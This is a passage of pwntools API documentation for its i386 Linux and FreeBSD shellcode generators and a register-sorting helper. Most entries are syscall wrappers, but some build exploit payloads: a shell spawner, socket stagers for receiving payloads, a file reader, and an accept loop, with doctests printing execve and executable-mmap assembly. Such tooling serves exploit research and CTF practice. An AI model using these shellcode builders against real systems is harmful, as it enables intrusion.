(mqdes, notification)[source]¶ Invokes the syscall mq_notify. See ‘man 2 mq_notify’ for more information.
Parameters: - mqdes (mqd_t) – mqdes
- notification (sigevent) – notification
-
pwnlib.shellcraft.i386.linux.
mq_open
(name, oflag, vararg)[source]¶ Invokes the syscall mq_open. See ‘man 2 mq_open’ for more information.
Parameters:
-
pwnlib.shellcraft.i386.linux.
mq_timedreceive
(mqdes, msg_ptr, msg_len, msg_prio, abs_timeout)[source]¶ Invokes the syscall mq_timedreceive. See ‘man 2 mq_timedreceive’ for more information.
Parameters: - mqdes (mqd_t) – mqdes
- msg_ptr (char) – msg_ptr
- msg_len (size_t) – msg_len
- msg_prio (unsigned) – msg_prio
- abs_timeout (timespec) – abs_timeout
-
pwnlib.shellcraft.i386.linux.
mq_timedsend
(mqdes, msg_ptr, msg_len, msg_prio, abs_timeout)[source]¶ Invokes the syscall mq_timedsend. See ‘man 2 mq_timedsend’ for more information.
Parameters: - mqdes (mqd_t) – mqdes
- msg_ptr (char) – msg_ptr
- msg_len (size_t) – msg_len
- msg_prio (unsigned) – msg_prio
- abs_timeout (timespec) – abs_timeout
-
pwnlib.shellcraft.i386.linux.
mq_unlink
(name)[source]¶ Invokes the syscall mq_unlink. See ‘man 2 mq_unlink’ for more information.
Parameters: name (char) – name
-
pwnlib.shellcraft.i386.linux.
mremap
(addr, old_len, new_len, flags, vararg)[source]¶ Invokes the syscall mremap. See ‘man 2 mremap’ for more information.
Parameters:
-
pwnlib.shellcraft.i386.linux.
msync
(addr, length, flags)[source]¶ Invokes the syscall msync. See ‘man 2 msync’ for more information.
Parameters: - addr (void) – addr
- len (size_t) – len
- flags (int) – flags
-
pwnlib.shellcraft.i386.linux.
munlock
(addr, length)[source]¶ Invokes the syscall munlock. See ‘man 2 munlock’ for more information.
Parameters: - addr (void) – addr
- len (size_t) – len
-
pwnlib.shellcraft.i386.linux.
munlockall
()[source]¶ Invokes the syscall munlockall. See ‘man 2 munlockall’ for more information.
Arguments:
-
pwnlib.shellcraft.i386.linux.
munmap
(addr, length)[source]¶ Invokes the syscall munmap. See ‘man 2 munmap’ for more information.
Parameters: - addr (void) – addr
- len (size_t) – len
-
pwnlib.shellcraft.i386.linux.
nanosleep
(requested_time, remaining)[source]¶ Invokes the syscall nanosleep. See ‘man 2 nanosleep’ for more information.
Parameters: - requested_time (timespec) – requested_time
- remaining (timespec) – remaining
-
pwnlib.shellcraft.i386.linux.
nice
(inc)[source]¶ Invokes the syscall nice. See ‘man 2 nice’ for more information.
Parameters: inc (int) – inc
-
pwnlib.shellcraft.i386.linux.
open
(file, oflag, vararg)[source]¶ Invokes the syscall open. See ‘man 2 open’ for more information.
Parameters:
-
pwnlib.shellcraft.i386.linux.
openat
(fd, file, oflag, vararg)[source]¶ Invokes the syscall openat. See ‘man 2 openat’ for more information.
Parameters:
-
pwnlib.shellcraft.i386.linux.
pause
()[source]¶ Invokes the syscall pause. See ‘man 2 pause’ for more information.
Arguments:
-
pwnlib.shellcraft.i386.linux.
pidmax
()[source]¶ Retrieves the highest numbered PID on the system, according to the sysctl kernel.pid_max.
-
pwnlib.shellcraft.i386.linux.
pipe
(pipedes)[source]¶ Invokes the syscall pipe. See ‘man 2 pipe’ for more information.
Parameters: pipedes (int) – pipedes
-
pwnlib.shellcraft.i386.linux.
pipe2
(pipedes, flags)[source]¶ Invokes the syscall pipe2. See ‘man 2 pipe2’ for more information.
Parameters:
-
pwnlib.shellcraft.i386.linux.
poll
(fds, nfds, timeout)[source]¶ Invokes the syscall poll. See ‘man 2 poll’ for more information.
Parameters: - fds (pollfd) – fds
- nfds (nfds_t) – nfds
- timeout (int) – timeout
-
pwnlib.shellcraft.i386.linux.
ppoll
(fds, nfds, timeout, ss)[source]¶ Invokes the syscall ppoll. See ‘man 2 ppoll’ for more information.
Parameters: - fds (pollfd) – fds
- nfds (nfds_t) – nfds
- timeout (timespec) – timeout
- ss (sigset_t) – ss
-
pwnlib.shellcraft.i386.linux.
prctl
(option, *vararg)[source]¶ Invokes the syscall prctl. See ‘man 2 prctl’ for more information.
Parameters:
-
pwnlib.shellcraft.i386.linux.
pread
(fd, buf, nbytes, offset)[source]¶ Invokes the syscall pread. See ‘man 2 pread’ for more information.
Parameters: - fd (int) – fd
- buf (void) – buf
- nbytes (size_t) – nbytes
- offset (off_t) – offset
-
pwnlib.shellcraft.i386.linux.
preadv
(fd, iovec, count, offset)[source]¶ Invokes the syscall preadv. See ‘man 2 preadv’ for more information.
Parameters:
-
pwnlib.shellcraft.i386.linux.
prlimit64
(pid, resource, new_limit, old_limit)[source]¶ Invokes the syscall prlimit64. See ‘man 2 prlimit64’ for more information.
Parameters: - pid (pid_t) – pid
- resource (rlimit_resource) – resource
- new_limit (rlimit64) – new_limit
- old_limit (rlimit64) – old_limit
-
pwnlib.shellcraft.i386.linux.
profil
(sample_buffer, size, offset, scale)[source]¶ Invokes the syscall profil. See ‘man 2 profil’ for more information.
Parameters: - sample_buffer (unsigned) – sample_buffer
- size (size_t) – size
- offset (size_t) – offset
- scale (unsigned) – scale
-
pwnlib.shellcraft.i386.linux.
ptrace
(request, *vararg)[source]¶ Invokes the syscall ptrace. See ‘man 2 ptrace’ for more information.
Parameters: - request (ptrace_request) – request
- vararg (int) – vararg
-
pwnlib.shellcraft.i386.linux.
push
(value)[source]¶ Thin wrapper around
pwnlib.shellcraft.i386.push()
, which sets context.os to ‘linux’ before calling.Example
>>> print pwnlib.shellcraft.i386.linux.push('SYS_execve').rstrip() /* push (SYS_execve) (0xb) */ push 0xb
-
pwnlib.shellcraft.i386.linux.
putpmsg
(fildes, ctlptr, dataptr, band, flags)[source]¶ Invokes the syscall putpmsg. See ‘man 2 putpmsg’ for more information.
Parameters:
-
pwnlib.shellcraft.i386.linux.
pwrite
(fd, buf, n, offset)[source]¶ Invokes the syscall pwrite. See ‘man 2 pwrite’ for more information.
Parameters: - fd (int) – fd
- buf (void) – buf
- n (size_t) – n
- offset (off_t) – offset
-
pwnlib.shellcraft.i386.linux.
pwritev
(fd, iovec, count, offset)[source]¶ Invokes the syscall pwritev. See ‘man 2 pwritev’ for more information.
Parameters:
-
pwnlib.shellcraft.i386.linux.
read
(fd, buf, nbytes)[source]¶ Invokes the syscall read. See ‘man 2 read’ for more information.
Parameters: - fd (int) – fd
- buf (void) – buf
- nbytes (size_t) – nbytes
-
pwnlib.shellcraft.i386.linux.
readahead
(fd, offset, count)[source]¶ Invokes the syscall readahead. See ‘man 2 readahead’ for more information.
Parameters: - fd (int) – fd
- offset (off64_t) – offset
- count (size_t) – count
-
pwnlib.shellcraft.i386.linux.
readdir
(dirp)[source]¶ Invokes the syscall readdir. See ‘man 2 readdir’ for more information.
Parameters: dirp (DIR) – dirp
-
pwnlib.shellcraft.i386.linux.
readfile
(path, dst='esi')[source]¶ Args: [path, dst (imm/reg) = esi ] Opens the specified file path and sends its content to the specified file descriptor.
-
pwnlib.shellcraft.i386.linux.
readlink
(path, buf, length)[source]¶ Invokes the syscall readlink. See ‘man 2 readlink’ for more information.
Parameters: - path (char) – path
- buf (char) – buf
- len (size_t) – len
-
pwnlib.shellcraft.i386.linux.
readlinkat
(fd, path, buf, length)[source]¶ Invokes the syscall readlinkat. See ‘man 2 readlinkat’ for more information.
Parameters: - fd (int) – fd
- path (char) – path
- buf (char) – buf
- len (size_t) – len
-
pwnlib.shellcraft.i386.linux.
readn
(fd, buf, nbytes)[source]¶ Reads exactly nbytes bytes from file descriptor fd into the buffer buf.
Parameters: - fd (int) – fd
- buf (void) – buf
- nbytes (size_t) – nbytes
-
pwnlib.shellcraft.i386.linux.
readv
(fd, iovec, count)[source]¶ Invokes the syscall readv. See ‘man 2 readv’ for more information.
Parameters:
-
pwnlib.shellcraft.i386.linux.
recv
(fd, buf, n, flags)[source]¶ Invokes the syscall recv. See ‘man 2 recv’ for more information.
Parameters:
-
pwnlib.shellcraft.i386.linux.
recvfrom
(fd, buf, n, flags, addr, addr_len)[source]¶ Invokes the syscall recvfrom. See ‘man 2 recvfrom’ for more information.
Parameters:
-
pwnlib.shellcraft.i386.linux.
recvmmsg
(fd, vmessages, vlen, flags, tmo)[source]¶ Invokes the syscall recvmmsg. See ‘man 2 recvmmsg’ for more information.
Parameters:
-
pwnlib.shellcraft.i386.linux.
recvmsg
(fd, message, flags)[source]¶ Invokes the syscall recvmsg. See ‘man 2 recvmsg’ for more information.
Parameters:
-
pwnlib.shellcraft.i386.linux.
recvsize
(sock, reg='ecx')[source]¶ Recives 4 bytes size field Useful in conjuncion with findpeer and stager :param sock, the socket to read the payload from.: :param reg, the place to put the size: :type reg, the place to put the size: default ecx
Leaves socket in ebx
-
pwnlib.shellcraft.i386.linux.
remap_file_pages
(start, size, prot, pgoff, flags)[source]¶ Invokes the syscall remap_file_pages. See ‘man 2 remap_file_pages’ for more information.
Parameters:
-
pwnlib.shellcraft.i386.linux.
rename
(old, new)[source]¶ Invokes the syscall rename. See ‘man 2 rename’ for more information.
Parameters: - old (char) – old
- new (char) – new
-
pwnlib.shellcraft.i386.linux.
renameat
(oldfd, old, newfd, new)[source]¶ Invokes the syscall renameat. See ‘man 2 renameat’ for more information.
Parameters:
-
pwnlib.shellcraft.i386.linux.
rmdir
(path)[source]¶ Invokes the syscall rmdir. See ‘man 2 rmdir’ for more information.
Parameters: path (char) – path
-
pwnlib.shellcraft.i386.linux.
sched_get_priority_max
(algorithm)[source]¶ Invokes the syscall sched_get_priority_max. See ‘man 2 sched_get_priority_max’ for more information.
Parameters: algorithm (int) – algorithm
-
pwnlib.shellcraft.i386.linux.
sched_get_priority_min
(algorithm)[source]¶ Invokes the syscall sched_get_priority_min. See ‘man 2 sched_get_priority_min’ for more information.
Parameters: algorithm (int) – algorithm
-
pwnlib.shellcraft.i386.linux.
sched_getaffinity
(pid, cpusetsize, cpuset)[source]¶ Invokes the syscall sched_getaffinity. See ‘man 2 sched_getaffinity’ for more information.
Parameters: - pid (pid_t) – pid
- cpusetsize (size_t) – cpusetsize
- cpuset (cpu_set_t) – cpuset
-
pwnlib.shellcraft.i386.linux.
sched_getparam
(pid, param)[source]¶ Invokes the syscall sched_getparam. See ‘man 2 sched_getparam’ for more information.
Parameters: - pid (pid_t) – pid
- param (sched_param) – param
-
pwnlib.shellcraft.i386.linux.
sched_getscheduler
(pid)[source]¶ Invokes the syscall sched_getscheduler. See ‘man 2 sched_getscheduler’ for more information.
Parameters: pid (pid_t) – pid
-
pwnlib.shellcraft.i386.linux.
sched_rr_get_interval
(pid, t)[source]¶ Invokes the syscall sched_rr_get_interval. See ‘man 2 sched_rr_get_interval’ for more information.
Parameters: - pid (pid_t) – pid
- t (timespec) – t
-
pwnlib.shellcraft.i386.linux.
sched_setaffinity
(pid, cpusetsize, cpuset)[source]¶ Invokes the syscall sched_setaffinity. See ‘man 2 sched_setaffinity’ for more information.
Parameters: - pid (pid_t) – pid
- cpusetsize (size_t) – cpusetsize
- cpuset (cpu_set_t) – cpuset
-
pwnlib.shellcraft.i386.linux.
sched_setparam
(pid, param)[source]¶ Invokes the syscall sched_setparam. See ‘man 2 sched_setparam’ for more information.
Parameters: - pid (pid_t) – pid
- param (sched_param) – param
-
pwnlib.shellcraft.i386.linux.
sched_setscheduler
(pid, policy, param)[source]¶ Invokes the syscall sched_setscheduler. See ‘man 2 sched_setscheduler’ for more information.
Parameters: - pid (pid_t) – pid
- policy (int) – policy
- param (sched_param) – param
-
pwnlib.shellcraft.i386.linux.
sched_yield
()[source]¶ Invokes the syscall sched_yield. See ‘man 2 sched_yield’ for more information.
Arguments:
-
pwnlib.shellcraft.i386.linux.
select
(nfds, readfds, writefds, exceptfds, timeout)[source]¶ Invokes the syscall select. See ‘man 2 select’ for more information.
Parameters: - nfds (int) – nfds
- readfds (fd_set) – readfds
- writefds (fd_set) – writefds
- exceptfds (fd_set) – exceptfds
- timeout (timeval) – timeout
-
pwnlib.shellcraft.i386.linux.
sendfile
(out_fd, in_fd, offset, count)[source]¶ Invokes the syscall sendfile. See ‘man 2 sendfile’ for more information.
Parameters:
-
pwnlib.shellcraft.i386.linux.
sendfile64
(out_fd, in_fd, offset, count)[source]¶ Invokes the syscall sendfile64. See ‘man 2 sendfile64’ for more information.
Parameters:
-
pwnlib.shellcraft.i386.linux.
setdomainname
(name, length)[source]¶ Invokes the syscall setdomainname. See ‘man 2 setdomainname’ for more information.
Parameters: - name (char) – name
- len (size_t) – len
-
pwnlib.shellcraft.i386.linux.
setgid
(gid)[source]¶ Invokes the syscall setgid. See ‘man 2 setgid’ for more information.
Parameters: gid (gid_t) – gid
-
pwnlib.shellcraft.i386.linux.
setgroups
(n, groups)[source]¶ Invokes the syscall setgroups. See ‘man 2 setgroups’ for more information.
Parameters: - n (size_t) – n
- groups (gid_t) – groups
-
pwnlib.shellcraft.i386.linux.
sethostname
(name, length)[source]¶ Invokes the syscall sethostname. See ‘man 2 sethostname’ for more information.
Parameters: - name (char) – name
- len (size_t) – len
-
pwnlib.shellcraft.i386.linux.
setitimer
(which, new, old)[source]¶ Invokes the syscall setitimer. See ‘man 2 setitimer’ for more information.
Parameters: - which (itimer_which_t) – which
- new (itimerval) – new
- old (itimerval) – old
-
pwnlib.shellcraft.i386.linux.
setpgid
(pid, pgid)[source]¶ Invokes the syscall setpgid. See ‘man 2 setpgid’ for more information.
Parameters: - pid (pid_t) – pid
- pgid (pid_t) – pgid
-
pwnlib.shellcraft.i386.linux.
setpriority
(which, who, prio)[source]¶ Invokes the syscall setpriority. See ‘man 2 setpriority’ for more information.
Parameters: - which (priority_which_t) – which
- who (id_t) – who
- prio (int) – prio
-
pwnlib.shellcraft.i386.linux.
setregid
(gid='egid')[source]¶ Args: [gid (imm/reg) = egid] Sets the real and effective group id.
-
pwnlib.shellcraft.i386.linux.
setresgid
(rgid, egid, sgid)[source]¶ Invokes the syscall setresgid. See ‘man 2 setresgid’ for more information.
Parameters: - rgid (gid_t) – rgid
- egid (gid_t) – egid
- sgid (gid_t) – sgid
-
pwnlib.shellcraft.i386.linux.
setresuid
(ruid, euid, suid)[source]¶ Invokes the syscall setresuid. See ‘man 2 setresuid’ for more information.
Parameters: - ruid (uid_t) – ruid
- euid (uid_t) – euid
- suid (uid_t) – suid
-
pwnlib.shellcraft.i386.linux.
setreuid
(uid='euid')[source]¶ Args: [uid (imm/reg) = euid] Sets the real and effective user id.
-
pwnlib.shellcraft.i386.linux.
setrlimit
(resource, rlimits)[source]¶ Invokes the syscall setrlimit. See ‘man 2 setrlimit’ for more information.
Parameters: - resource (rlimit_resource_t) – resource
- rlimits (rlimit) – rlimits
-
pwnlib.shellcraft.i386.linux.
setsid
()[source]¶ Invokes the syscall setsid. See ‘man 2 setsid’ for more information.
Arguments:
-
pwnlib.shellcraft.i386.linux.
setsockopt
(sockfd, level, optname, optval, optlen)[source]¶ Invokes the syscall setsockopt. See ‘man 2 setsockopt’ for more information.
Parameters:
-
pwnlib.shellcraft.i386.linux.
setsockopt_timeout
(sock, secs)[source]¶ Invokes the syscall fork. See ‘man 2 fork’ for more information.
Parameters:
-
pwnlib.shellcraft.i386.linux.
settimeofday
(tv, tz)[source]¶ Invokes the syscall settimeofday. See ‘man 2 settimeofday’ for more information.
Parameters: - tv (timeval) – tv
- tz (timezone) – tz
-
pwnlib.shellcraft.i386.linux.
setuid
(uid)[source]¶ Invokes the syscall setuid. See ‘man 2 setuid’ for more information.
Parameters: uid (uid_t) – uid
-
pwnlib.shellcraft.i386.linux.
sh
()[source]¶ Execute a different process.
>>> p = run_assembly(shellcraft.i386.linux.sh()) >>> p.sendline('echo Hello') >>> p.recv() 'Hello\n'
-
pwnlib.shellcraft.i386.linux.
sigaction
(sig, act, oact)[source]¶ Invokes the syscall sigaction. See ‘man 2 sigaction’ for more information.
Parameters:
-
pwnlib.shellcraft.i386.linux.
sigaltstack
(ss, oss)[source]¶ Invokes the syscall sigaltstack. See ‘man 2 sigaltstack’ for more information.
Parameters: - ss (sigaltstack) – ss
- oss (sigaltstack) – oss
-
pwnlib.shellcraft.i386.linux.
signal
(sig, handler)[source]¶ Invokes the syscall signal. See ‘man 2 signal’ for more information.
Parameters: - sig (int) – sig
- handler (sighandler_t) – handler
-
pwnlib.shellcraft.i386.linux.
sigpending
(set)[source]¶ Invokes the syscall sigpending. See ‘man 2 sigpending’ for more information.
Parameters: set (sigset_t) – set
-
pwnlib.shellcraft.i386.linux.
sigprocmask
(how, set, oset)[source]¶ Invokes the syscall sigprocmask. See ‘man 2 sigprocmask’ for more information.
Parameters: - how (int) – how
- set (sigset_t) – set
- oset (sigset_t) – oset
-
pwnlib.shellcraft.i386.linux.
sigreturn
()[source]¶ Invokes the syscall sigreturn. See ‘man 2 sigreturn’ for more information.
-
pwnlib.shellcraft.i386.linux.
sigsuspend
(set)[source]¶ Invokes the syscall sigsuspend. See ‘man 2 sigsuspend’ for more information.
Parameters: set (sigset_t) – set
-
pwnlib.shellcraft.i386.linux.
socket
(network='ipv4', proto='tcp')[source]¶ Creates a new socket
Parameters:
-
pwnlib.shellcraft.i386.linux.
socketcall
(socketcall, socket, sockaddr, sockaddr_len)[source]¶ Invokes a socket call (e.g. socket, send, recv, shutdown)
-
pwnlib.shellcraft.i386.linux.
splice
(fdin, offin, fdout, offout, length, flags)[source]¶ Invokes the syscall splice. See ‘man 2 splice’ for more information.
Parameters:
-
pwnlib.shellcraft.i386.linux.
stage
(fd=0, length=None)[source]¶ Migrates shellcode to a new buffer.
Parameters: Example
>>> p = run_assembly(shellcraft.stage()) >>> sc = asm(shellcraft.echo("Hello\n", constants.STDOUT_FILENO)) >>> p.pack(len(sc)) >>> p.send(sc) >>> p.recvline() 'Hello\n'
-
pwnlib.shellcraft.i386.linux.
stager
(sock, size, handle_error=False, tiny=False)[source]¶ Recives a fixed sized payload into a mmaped buffer Useful in conjuncion with findpeer. :param sock, the socket to read the payload from.: :param size, the size of the payload:
-
pwnlib.shellcraft.i386.linux.
stat
(file, buf)[source]¶ Invokes the syscall stat. See ‘man 2 stat’ for more information.
Parameters: - file (char) – file
- buf (stat) – buf
-
pwnlib.shellcraft.i386.linux.
stat64
(file, buf)[source]¶ Invokes the syscall stat64. See ‘man 2 stat64’ for more information.
Parameters: - file (char) – file
- buf (stat64) – buf
-
pwnlib.shellcraft.i386.linux.
stime
(when)[source]¶ Invokes the syscall stime. See ‘man 2 stime’ for more information.
Parameters: when (time_t) – when
-
pwnlib.shellcraft.i386.linux.
stty
(fd, params)[source]¶ Invokes the syscall stty. See ‘man 2 stty’ for more information.
Parameters: - fd (int) – fd
- params (sgttyb) – params
-
pwnlib.shellcraft.i386.linux.
symlink
(from_, to)[source]¶ Invokes the syscall symlink. See ‘man 2 symlink’ for more information.
Parameters: - from (char) – from
- to (char) – to
-
pwnlib.shellcraft.i386.linux.
symlinkat
(from_, tofd, to)[source]¶ Invokes the syscall symlinkat. See ‘man 2 symlinkat’ for more information.
Parameters: - from (char) – from
- tofd (int) – tofd
- to (char) – to
-
pwnlib.shellcraft.i386.linux.
sync
()[source]¶ Invokes the syscall sync. See ‘man 2 sync’ for more information.
Arguments:
-
pwnlib.shellcraft.i386.linux.
sync_file_range
(fd, offset, count, flags)[source]¶ Invokes the syscall sync_file_range. See ‘man 2 sync_file_range’ for more information.
Parameters: - fd (int) – fd
- offset (off64_t) – offset
- count (off64_t) – count
- flags (unsigned) – flags
-
pwnlib.shellcraft.i386.linux.
syscall
(syscall=None, arg0=None, arg1=None, arg2=None, arg3=None, arg4=None, arg5=None)[source]¶ - Args: [syscall_number, *args]
- Does a syscall
Any of the arguments can be expressions to be evaluated by
pwnlib.constants.eval()
.Example
>>> print pwnlib.shellcraft.i386.linux.syscall('SYS_execve', 1, 'esp', 2, 0).rstrip() /* call execve(1, 'esp', 2, 0) */ push (SYS_execve) /* 0xb */ pop eax push 1 pop ebx mov ecx, esp push 2 pop edx xor esi, esi int 0x80 >>> print pwnlib.shellcraft.i386.linux.syscall('SYS_execve', 2, 1, 0, 20).rstrip() /* call execve(2, 1, 0, 0x14) */ push (SYS_execve) /* 0xb */ pop eax push 2 pop ebx push 1 pop ecx push 0x14 pop esi cdq /* edx=0 */ int 0x80 >>> print pwnlib.shellcraft.i386.linux.syscall().rstrip() /* call syscall() */ int 0x80 >>> print pwnlib.shellcraft.i386.linux.syscall('eax', 'ebx', 'ecx').rstrip() /* call syscall('eax', 'ebx', 'ecx') */ /* setregs noop */ int 0x80 >>> print pwnlib.shellcraft.i386.linux.syscall('ebp', None, None, 1).rstrip() /* call syscall('ebp', ?, ?, 1) */ mov eax, ebp push 1 pop edx int 0x80 >>> print pwnlib.shellcraft.i386.linux.syscall( ... 'SYS_mmap2', 0, 0x1000, ... 'PROT_READ | PROT_WRITE | PROT_EXEC', ... 'MAP_PRIVATE | MAP_ANONYMOUS', ... -1, 0).rstrip() /* call mmap2(0, 0x1000, 'PROT_READ | PROT_WRITE | PROT_EXEC', 'MAP_PRIVATE | MAP_ANONYMOUS', -1, 0) */ xor eax, eax mov al, 0xc0 xor ebp, ebp xor ebx, ebx xor ecx, ecx mov ch, 0x1000 >> 8 push -1 pop edi push (PROT_READ | PROT_WRITE | PROT_EXEC) /* 7 */ pop edx push (MAP_PRIVATE | MAP_ANONYMOUS) /* 0x22 */ pop esi int 0x80
-
pwnlib.shellcraft.i386.linux.
syslog
(pri, fmt, vararg)[source]¶ Invokes the syscall syslog. See ‘man 2 syslog’ for more information.
Parameters:
-
pwnlib.shellcraft.i386.linux.
tee
(fdin, fdout, length, flags)[source]¶ Invokes the syscall tee. See ‘man 2 tee’ for more information.
Parameters:
-
pwnlib.shellcraft.i386.linux.
time
(timer)[source]¶ Invokes the syscall time. See ‘man 2 time’ for more information.
Parameters: timer (time_t) – timer
-
pwnlib.shellcraft.i386.linux.
timer_create
(clock_id, evp, timerid)[source]¶ Invokes the syscall timer_create. See ‘man 2 timer_create’ for more information.
Parameters: - clock_id (clockid_t) – clock_id
- evp (sigevent) – evp
- timerid (timer_t) – timerid
-
pwnlib.shellcraft.i386.linux.
timer_delete
(timerid)[source]¶ Invokes the syscall timer_delete. See ‘man 2 timer_delete’ for more information.
Parameters: timerid (timer_t) – timerid
-
pwnlib.shellcraft.i386.linux.
timer_getoverrun
(timerid)[source]¶ Invokes the syscall timer_getoverrun. See ‘man 2 timer_getoverrun’ for more information.
Parameters: timerid (timer_t) – timerid
-
pwnlib.shellcraft.i386.linux.
timer_gettime
(timerid, value)[source]¶ Invokes the syscall timer_gettime. See ‘man 2 timer_gettime’ for more information.
Parameters: - timerid (timer_t) – timerid
- value (itimerspec) – value
-
pwnlib.shellcraft.i386.linux.
timer_settime
(timerid, flags, value, ovalue)[source]¶ Invokes the syscall timer_settime. See ‘man 2 timer_settime’ for more information.
Parameters: - timerid (timer_t) – timerid
- flags (int) – flags
- value (itimerspec) – value
- ovalue (itimerspec) – ovalue
-
pwnlib.shellcraft.i386.linux.
truncate
(file, length)[source]¶ Invokes the syscall truncate. See ‘man 2 truncate’ for more information.
Parameters: - file (char) – file
- length (off_t) – length
-
pwnlib.shellcraft.i386.linux.
truncate64
(file, length)[source]¶ Invokes the syscall truncate64. See ‘man 2 truncate64’ for more information.
Parameters: - file (char) – file
- length (off64_t) – length
-
pwnlib.shellcraft.i386.linux.
ulimit
(cmd, vararg)[source]¶ Invokes the syscall ulimit. See ‘man 2 ulimit’ for more information.
Parameters:
-
pwnlib.shellcraft.i386.linux.
umask
(mask)[source]¶ Invokes the syscall umask. See ‘man 2 umask’ for more information.
Parameters: mask (mode_t) – mask
-
pwnlib.shellcraft.i386.linux.
uname
(name)[source]¶ Invokes the syscall uname. See ‘man 2 uname’ for more information.
Parameters: name (utsname) – name
-
pwnlib.shellcraft.i386.linux.
unlink
(name)[source]¶ Invokes the syscall unlink. See ‘man 2 unlink’ for more information.
Parameters: name (char) – name
-
pwnlib.shellcraft.i386.linux.
unlinkat
(fd, name, flag)[source]¶ Invokes the syscall unlinkat. See ‘man 2 unlinkat’ for more information.
Parameters:
Invokes the syscall unshare. See ‘man 2 unshare’ for more information.
Parameters: flags (int) – flags
-
pwnlib.shellcraft.i386.linux.
ustat
(dev, ubuf)[source]¶ Invokes the syscall ustat. See ‘man 2 ustat’ for more information.
Parameters: - dev (dev_t) – dev
- ubuf (ustat) – ubuf
-
pwnlib.shellcraft.i386.linux.
utime
(file, file_times)[source]¶ Invokes the syscall utime. See ‘man 2 utime’ for more information.
Parameters: - file (char) – file
- file_times (utimbuf) – file_times
-
pwnlib.shellcraft.i386.linux.
utimensat
(fd, path, times, flags)[source]¶ Invokes the syscall utimensat. See ‘man 2 utimensat’ for more information.
Parameters:
-
pwnlib.shellcraft.i386.linux.
utimes
(file, tvp)[source]¶ Invokes the syscall utimes. See ‘man 2 utimes’ for more information.
Parameters: - file (char) – file
- tvp (timeval) – tvp
-
pwnlib.shellcraft.i386.linux.
vfork
()[source]¶ Invokes the syscall vfork. See ‘man 2 vfork’ for more information.
Arguments:
-
pwnlib.shellcraft.i386.linux.
vhangup
()[source]¶ Invokes the syscall vhangup. See ‘man 2 vhangup’ for more information.
Arguments:
-
pwnlib.shellcraft.i386.linux.
vmsplice
(fdout, iov, count, flags)[source]¶ Invokes the syscall vmsplice. See ‘man 2 vmsplice’ for more information.
Parameters: - fdout (int) – fdout
- iov (iovec) – iov
- count (size_t) – count
- flags (unsigned) – flags
-
pwnlib.shellcraft.i386.linux.
wait4
(pid, stat_loc, options, usage)[source]¶ Invokes the syscall wait4. See ‘man 2 wait4’ for more information.
Parameters: - pid (pid_t) – pid
- stat_loc (WAIT_STATUS) – stat_loc
- options (int) – options
- usage (rusage) – usage
-
pwnlib.shellcraft.i386.linux.
waitid
(idtype, id, infop, options)[source]¶ Invokes the syscall waitid. See ‘man 2 waitid’ for more information.
Parameters: - idtype (idtype_t) – idtype
- id (id_t) – id
- infop (siginfo_t) – infop
- options (int) – options
-
pwnlib.shellcraft.i386.linux.
waitpid
(pid, stat_loc, options)[source]¶ Invokes the syscall waitpid. See ‘man 2 waitpid’ for more information.
Parameters:
pwnlib.shellcraft.i386.freebsd
¶
Shellcraft module containing Intel i386 shellcodes for FreeBSD.
-
pwnlib.shellcraft.i386.freebsd.
acceptloop_ipv4
(port)[source]¶ Args: port Waits for a connection. Leaves socket in EBP. ipv4 only
-
pwnlib.shellcraft.i386.freebsd.
i386_to_amd64
()[source]¶ Returns code to switch from i386 to amd64 mode.
-
pwnlib.shellcraft.i386.freebsd.
mov
(dest, src, stack_allowed=True)[source]¶ Thin wrapper around
pwnlib.shellcraft.i386.mov()
, which sets context.os to ‘freebsd’ before calling.Example
>>> print pwnlib.shellcraft.i386.freebsd.mov('eax', 'SYS_execve').rstrip() push (SYS_execve) /* 0x3b */ pop eax
-
pwnlib.shellcraft.i386.freebsd.
push
(value)[source]¶ Thin wrapper around
pwnlib.shellcraft.i386.push()
, which sets context.os to ‘freebsd’ before calling.Example
>>> print pwnlib.shellcraft.i386.freebsd.push('SYS_execve').rstrip() /* push (SYS_execve) (0x3b) */ push 0x3b
pwnlib.regsort
— Register sorting¶
Topographical sort
-
pwnlib.regsort.
check_cycle
(reg, assignments)[source]¶ Walk down the assignment list of a register, return the path walked if it is encountered again.
Returns: The list of register involved in the cycle. If there is no cycle, this is an empty list. Example
>>> check_cycle('a', {'a': 1}) [] >>> check_cycle('a', {'a': 'a'}) ['a'] >>> check_cycle('a', {'a': 'b', 'b': 'a'}) ['a', 'b'] >>> check_cycle('a', {'a': 'b', 'b': 'c', 'c': 'b', 'd': 'a'}) [] >>> check_cycle('a', {'a': 'b', 'b': 'c', 'c': 'd', 'd': 'a'}) ['a', 'b', 'c', 'd']
-
pwnlib.regsort.
extract_dependencies
(reg, assignments)[source]¶ Return a list of all registers which directly depend on the specified register.
Example
>>> extract_dependencies('a', {'a': 1}) [] >>> extract_dependencies('a', {'a': 'b', 'b': 1}) [] >>> extract_dependencies('a', {'a': 1, 'b': 'a'}) ['b'] >>> extract_dependencies('a', {'a': 1, 'b': 'a', 'c': 'a'}) ['b', 'c']
-
pwnlib.regsort.
regsort
(in_out, all_regs, tmp=None, xchg=True, randomize=None)[source]¶ Sorts register dependencies.
Given a dictionary of registers to desired register contents, return the optimal order in which to set the registers to those contents.
The implementation assumes that it is possible to move from any register to any other register.
If a dependency cycle is encountered, one of the following will occur:
- If
xchg
isTrue
, it is assumed that dependency cyles can be broken by swapping the contents of two register (a la thexchg
instruction on i386). - If
xchg
is not set, but not all destination registers inin_out
are involved in a cycle, one of the registers outside the cycle will be used as a temporary register, and then overwritten with its final value. - If
xchg
is not set, and all registers are involved in a dependency cycle, the named registertemporary
is used as a temporary register. - If the dependency cycle cannot be resolved as described above, an exception is raised.
Parameters: - in_out (dict) – Dictionary of desired register states. Keys are registers, values are either registers or any other value.
- all_regs (list) – List of all possible registers.
Used to determine which values in
in_out
are registers, versus regular values. - tmp (obj, str) – Named register (or other sentinel value) to use as a temporary
register. If
tmp
is a named register and appears as a source value inin_out
, dependencies are handled appropriately.tmp
cannot be a destination register inin_out
. Ifbool(tmp)==True
, this mode is enabled. - xchg (obj) – Indicates the existence of an instruction which can swap the
contents of two registers without use of a third register.
If
bool(xchg)==False
, this mode is disabled. - random (bool) – Randomize as much as possible about the order or registers.
Returns: A list of tuples of
(src, dest)
.Each register may appear more than once, if a register is used as a temporary register, and later overwritten with its final value.
If
xchg
isTrue
and it is used to break a dependency cycle, thenreg_name
will beNone
andvalue
will be a tuple of the instructions to swap.Example
>>> R = ['a', 'b', 'c', 'd', 'x', 'y', 'z']
If order doesn’t matter for any subsequence, alphabetic order is used.
